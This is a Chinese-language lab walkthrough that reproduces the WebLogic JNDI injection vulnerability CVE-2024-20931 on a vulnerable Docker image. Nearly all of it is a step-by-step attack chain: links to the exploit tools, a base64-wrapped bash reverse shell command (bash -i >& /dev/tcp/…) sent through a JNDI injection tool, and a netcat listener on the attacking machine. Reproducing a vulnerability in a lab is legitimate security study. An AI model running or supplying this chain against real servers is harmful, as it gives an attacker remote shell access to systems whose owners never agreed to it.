1.需要准备一个kali机(作为靶机)以及一个攻击机(可以选择windows虚拟机)
第一步:安装存在漏洞的镜像
docker pull ismaleiva90/weblogic12
第二步:启动docker镜像
docker run -dit -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest
第三步:利用工具进行exp利用
代码:java -jar CVE-2024-20931.jar(下载地址:https://github.com/dinosn/CVE-2024-20931)
第一个填写靶机的ip
第二个填写对应的端口
第三个填写JNDI的恶意构造的内容
第四步:使用jndi软件并运行进行注入(JNDI下载地址:https://github.com/welk1n/JNDI-Injection-Exploit)
bash -i >& /dev/tcp/①/② 0>&1
①处填入攻击机的ip
②处填入你需要监听的端口号
最后对上面进行base64加密
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,此处填写加密的东西} | {base64,-d} | {bash, -i }" -A "攻击机ip"
第五步:进行nc对JNDI对应的端口进行监听(nc软件电脑本身不自带需要去官网进行下载:https://eternallybored.org/misc/netcat/)
第六步:将恶意的服务地址填入工具中
需要填入恶意地址为箭头所指的地方
第七步:监听成功
复现成功
注:在同一个机子上面运行攻击机需要的软件